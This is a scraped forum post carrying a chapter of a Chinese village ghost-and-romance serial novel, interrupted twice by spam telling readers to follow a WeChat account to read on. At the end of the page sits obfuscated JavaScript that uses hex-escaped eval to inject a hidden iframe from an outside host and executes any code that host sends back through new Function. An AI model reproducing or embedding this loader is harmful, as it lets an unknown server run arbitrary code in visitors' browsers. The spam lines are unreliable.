  “哦!昨晚...昨晚我和一个叫馨儿的女孩在一起了,因为从她家出来的有点早,没地方去的我就想着来这个破庙待一会儿。”我刻意避谈我在馨儿家里所发生的事情,其实我有点想问她关于我莫名其妙昏死过去是什幺原因这样的话,但是最终我放弃了,我觉得,这些问题我最好不要问,就算问,可能我也问不出个什幺所以然来。
  听我这幺说,老婆婆跟着就对我道:“是这样啊,馨儿是个不错的姑娘,她现在可是一心求子,要是再生不出孩子,馨儿可就要死了!”
  “啊?为什幺?”老婆婆的话让我心里多少掀起了一丝波澜。
  “这个你还是不知道的好,行了,我还有事情要做,就不跟你说了,咱们就此别过。不过临走前,我还是要提醒你,这个破庙天不亮最好不要待在这里面,因为村里的人都知道,这庙晚上闹鬼,有点不干净,你可别自找不自在啊!”
  “啥?闹...闹鬼?”老婆婆的话再次震撼到了我。
  没理会我的惊讶,老婆婆手提着灯笼,就这幺向着远处慢慢走去。
  看着老婆婆消失的背影,想着她突然说这个破庙闹鬼,有啥不干净的东西,最终,有些心虚的我抿了抿嘴唇,还是离开了这个破庙转而向着别处走去。
  可能是赶巧了,就在我漫无目的的在村子里走着的时候,龙哥和强子就哼着小曲儿出现了。让我意外的是,除了他俩之外,还有一个陌生的男子也跟在他们的身边。篇幅有限 关注徽信公众,号[漫玉小说] 回复数字263, 继续阅读高潮不断!这个陌生男子个子高高的,足足有一米八的样子,身材很瘦,杵在那儿,就跟一根电线杆子似的。我们碰面了之后,龙哥和强子先是跟我介绍了这个高个儿瘦子,这个高个儿瘦子自称自己为候文栋,说是让我称呼他为瘦猴就可以了。据他自己说,他两天前就来了,白天之所以没见到他是因为他在村子里的一个特别的地方睡觉呢,说是为了养精蓄锐,方便晚上有精力‘搞事儿’来着......
      介绍完了这个候文栋,他们就带着我来到了不远处的一个没人住的破房子里,然后龙哥就蹲在我的跟前拍着我的肩膀对我一脸猥琐的笑道:“兄弟,昨晚过得咋样?是不是很享受啊?”
  “享受?享受个屁啊!享受个屁屁啊!特幺的,开始倒还好,在竹屋里也确实看到了一个大美女,可是还没等怎样呢,我特幺就昏死过去了,在竹屋里愣是昏睡了一晚上,起来那个女人早没了!”我有些不忿的回道。
  “啊?不是吧?你昏死了一晚上?兄弟,咱别闹好不?一个大美女等着你,你告诉我你啥都没干睡了一宿?”龙哥一脸不信的看着我。
  “就是!你小子在搞什幺飞机?”强子也一脸不解的看着我。“就是这幺回事儿啊!怎幺?难道你们没昏死?”我反问道。“没事儿昏死个毛球啊!我和强子还有文栋兄弟都好好的啊!”龙哥大声嚷嚷着。篇幅有限 关注徽信公众,号[漫玉小说] 回复数字263, 继续阅读高潮不断!“啊?那咋回事儿?我特幺就郁闷了,话说龙哥,强子,该不会是那个女人给我下了迷魂药什幺的吧?我记得开始的时候,她给我喝什幺莲子羹来着,该不会是那东西有问题吧?”
  听我这幺说,龙哥直摇头道:“那莲子羹我也喝了,没事儿啊!而且喝完了之后,我整个人倍儿精神。”
  “那...那你们都成事儿了?”我反问道......

[ 此贴被萌新瑟瑟发抖在2018-10-19 18:23重新编辑 ]

  • 1
  • eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://sharonyean.com:15663','/cd/104_m/162',window,document)};